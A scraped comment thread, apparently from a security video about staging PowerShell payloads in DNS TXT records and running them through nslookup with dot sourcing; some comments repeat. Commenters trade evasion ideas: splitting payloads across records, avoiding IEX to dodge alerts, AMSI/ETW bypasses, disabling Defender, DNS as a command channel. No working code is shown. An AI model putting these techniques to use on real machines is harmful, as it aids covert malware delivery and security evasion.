PS, huge thanks to PlexTrac for sponsoring this video! PlexTrac is being crazy generous and put together a special page and bundle to help celebrate the channel's community -- and they are offering a FREE month of their collaborative reporting platform! j-h.io/plextrac
The period before (nslookup...)[-1] is called "dot sourcing". It interprets whatever comes next as a command. This is what allows "notepad.exe" (with quotes) to execute when normally it would be parsed as a string. Checkout the PowerShell about_Scripts help file or article for details.
I love how you talk through the thought process, that's the best education I can get and what I love most about your channel dude. Thanks much for all the great content
Watching you work through your thought process is PURE GOLD! It's so great to see such a talented human work through problems and not just cut the video to make it seem like you got it right the first time!! Thank you for the great content!!
TXT records can store up to 4000 characters of data, but only in strings of 255. So you probably could do some more powershell voodoo to get it into a single continuous string for execution
I think some providers are implementing fixes. DigitalOcean is matching characters such as : ' " ( ) /. And not propagating the record. When you remove the characters the original powershell command is propagated. Not sure though.
Even though IEX wasn't typed, I'm almost sure windows defender will still detect it when it get's executed right? So in the end it's more of a proof of concept and an obscure way to hide logs.
I have the same question. Maybe if the payload would run completely off the initial DNS method, then windows defender could possibly be bypassed? Who knows
@@mindddfuzzz Thank you Khalid for the explanation! However, wouldn't AV/Defender detect the malicious payload being executed in memory? If that the only case it would be vital against old machines and older iterations of AV/EDRs that do not support in-memory detection and protection.
No. You need the victim to have access to a dns server with your malicious records. You can do this, or control the victim's dns server (router/ISP MIM), or get your dns server to somehow be trusted as an authoritative dns server
Hi John,whatched and studied your video,spend money on 2 domains, but still doesn't work, because u don't use DNS for reverse shell ,u use the actual payload.
I bumped around with this but left it out of the footage because I couldn't get something working -- nslookup seemingly returns the records in a random order. I suppose you can try to sort them within PowerShell, but that might have other constraints (more weird stuff in the logged PowerShell syntax, or having to finagle your payload to be "sortable" without issue). What might be clever is adding a prefix and and and so on block comments to get it sorted and see if it can be sanely retrieved and executed
seems way more sketchy than iex net webclient too me. your still launching with enc or iex regardless. i can still bypass security in 2023 with a simple netweb iex to a script with a solid amsi etw bypass before decryption. this strat is like the forfiles trick to me and is better for application whitelist bypass rather than avoiding detection.
I imagine if you break down the call back payload into multiple TXT records, you can save them as a variable in the terminal them concatenate everything together, then run the variable. Would that still leave traces in the system ?
I'm gonna have to test it but I think it should work. Regarding detection, you can log every powershell command with scriptblock logging , even this nslookup would be logged
so if i say it shortly which will done JHON in 27 min on his video is, when fire up your domain which is (windowsapps.online) then DNS record automatically download PowerShell script and run it and give hacker an agent inside PowerShell-empire which will get control my windows device? @_JohnHammond please notify my mistake if i said so.
PS, huge thanks to PlexTrac for sponsoring this video! PlexTrac is being crazy generous and put together a special page and bundle to help celebrate the channel's community -- and they are offering a FREE month of their collaborative reporting platform! j-h.io/plextrac
Thanks for the shout-out, John
Lovely PoC. It's my style; janky but fun to play with :)
Have you already tried to slit the payload up into smaller 255 char strings? Apparently that's supported by TXT records up to 4000 characters
The period before (nslookup...)[-1] is called "dot sourcing". It interprets whatever comes next as a command. This is what allows "notepad.exe" (with quotes) to execute when normally it would be parsed as a string. Checkout the PowerShell about_Scripts help file or article for details.
cool
I love how you talk through the thought process, that's the best education I can get and what I love most about your channel dude. Thanks much for all the great content
Dang, John out here giving out hidden treasures like Al…. Good red teamer and deserves the recognition
Watching you work through your thought process is PURE GOLD! It's so great to see such a talented human work through problems and not just cut the video to make it seem like you got it right the first time!! Thank you for the great content!!
TXT records can store up to 4000 characters of data, but only in strings of 255. So you probably could do some more powershell voodoo to get it into a single continuous string for execution
your IT-powerlevel is over 9000! Awesome video, thx a lot!
LOVE that kept the trial and error aspects and your thinking. Super fun.
That's awesome he is a friend of mine as well and I have recently started using that technique as well
I really appreciate the effort that you make in order to share your skills with community and such.
Hi John, it's 11pm in Australia so gotta sleep but keen to watch tomorrow. Keep up the amazing content, honestly the best
But ultimately there is still an IEX executed. Would still be captured by monitoring.
Always good to take time and see John work his magic
This was awesome to watch as always. Keep up the great work John.
u can also us PowerDNS project to delivering PowerShell payloads using DNS as an egress channel.. ..
17:32 I faced this challenge while setting up dkim on my aws domain. There you need to separate them by a new line in the same rocord box
I think some providers are implementing fixes. DigitalOcean is matching characters such as : ' " ( ) /. And not propagating the record. When you remove the characters the original powershell command is propagated. Not sure though.
That was a fanatic video and greatly appreciated! ❤
Even though IEX wasn't typed, I'm almost sure windows defender will still detect it when it get's executed right? So in the end it's more of a proof of concept and an obscure way to hide logs.
I have the same question. Maybe if the payload would run completely off the initial DNS method, then windows defender could possibly be bypassed? Who knows
Wow a new trick for my trickbag, kudos !
13:05 Please let me know how to make terminal autocomplete options!!!
you’re a legend sir. ty for the great content
hmmm... nifty.
Also, your domain still has its ngrok TXT records...
Is there a way to use something like executable packing to make it smaller?
Did you still have to have defender disabled at the end to get that to run?
Did this through local dns. Ran it with ; with two commands in the same text-record. Download from local webserver ; run with powershell.
14:19 Real-time protection: "You can turn off this setting for a short time before it turns back on automatically"
Best part: let's set this to 9001 because it's over 9000
I understood that reference
OMGGG IT WORKED!!! I finally got this app and I
Hi John, recently i hear somthing about "Microsoft Teams' GIFShell Attack"
. Maybe in the future some example videos will be nice. GG
yeah, i saw this too.
but did windefender detect that ?
Sure did
It detected the payload but not the nslookup. It's a proof of concept showing that you *could* do something with this
how's it going so far?
Would you verify that AMSI also detects this C2 connection trial via DNS records or not even if the WindowsDefender is activated?
Thank you John for the awesome content as always! I am only wondering what is the gain of avoiding executing iex in the command prompt?
Security products alert on IEX\Invoke-Expression
@@mindddfuzzz Thank you Khalid for the explanation! However, wouldn't AV/Defender detect the malicious payload being executed in memory? If that the only case it would be vital against old machines and older iterations of AV/EDRs that do not support in-memory detection and protection.
That got me thinking... Couldn't you develop a DNS server that acts as a C2 and receives payloads via DNS queries? I'm going to have to try that...
Could you use your own IP instead of Google's? So you can then return whatever you want, maybe more characters?
No. You need the victim to have access to a dns server with your malicious records. You can do this, or control the victim's dns server (router/ISP MIM), or get your dns server to somehow be trusted as an authoritative dns server
@@y.vinitsky6452 You can specify the DNS host, like John does for Google's
Hi John,whatched and studied your video,spend money on 2 domains, but still doesn't work, because u don't use DNS for reverse shell ,u use the actual payload.
Thanks for the video, very helpful and well explained. Off to make so soft
That's pretty slick. :)
can it bypass windows defender?
to my knowledge you could add as many txt records as needed, just have to add quotes every 255 characters
I bumped around with this but left it out of the footage because I couldn't get something working -- nslookup seemingly returns the records in a random order. I suppose you can try to sort them within PowerShell, but that might have other constraints (more weird stuff in the logged PowerShell syntax, or having to finagle your payload to be "sortable" without issue).
What might be clever is adding a prefix and and and so on block comments to get it sorted and see if it can be sanely retrieved and executed
Nice to see your new video
Thanks for share this video. Is it not possible with "short url" to parse a powershell command? Ö.Ö
seems way more sketchy than iex net webclient too me. your still launching with enc or iex regardless. i can still bypass security in 2023 with a simple netweb iex to a script with a solid amsi etw bypass before decryption. this strat is like the forfiles trick to me and is better for application whitelist bypass rather than avoiding detection.
I imagine if you break down the call back payload into multiple TXT records, you can save them as a variable in the terminal them concatenate everything together, then run the variable. Would that still leave traces in the system ?
I'm gonna have to test it but I think it should work.
Regarding detection, you can log every powershell command with scriptblock logging , even this nslookup would be logged
Awesome trick 💪😎
when John wins... i feel like i win. lol. nice work
lol @ JH learning about text record limits :D
That's neat
SPF is a TXT record..
thangs!
Based af.
so if i say it shortly which will done JHON in 27 min on his video is, when fire up your domain which is (windowsapps.online) then DNS record automatically download PowerShell script and run it and give hacker an agent inside PowerShell-empire which will get control my windows device? @_JohnHammond please notify my mistake if i said so.
Hello Sir we need from you make courses in Udemy about hack and any information did you have and u can share it really u are intelligent .
luv it :D
Left and right data in a printed copy-past
hi john love you bro can we see a video on ssl pinning on android and ios and windows ♥
How many hit to rick role with this?
i was about to get hacked with a crypted Invoke Expression DNS
Enough to go mad
cool trick :)
👍
Avoid PowerShell.
cool
CrowdStrike doesn’t like it if queries are ran this way 🙃
HELLO CHEF!
Yayyyy
You should not wrap you TXT record into quotes I think.
Kovter 2.0? o.o
🤛🤛
I am watching you since a year ago but today i get to know who the fuck is ed Sheeran
Thanks for the interesting content, but I don't think I like the popping in ad banner, that smells too much like some cable TV ad to me... :/
Please stop using a generic 'shocked influencer face' in your thumbnails.
Bro how to hack hacker bjorka 😁😁😁 he is tranding in my country
👑I am Diploma in computer Engineer 👑 From Bangladesh
Are you sure that Microsfot Defender doesn't detect malware when you activate it again?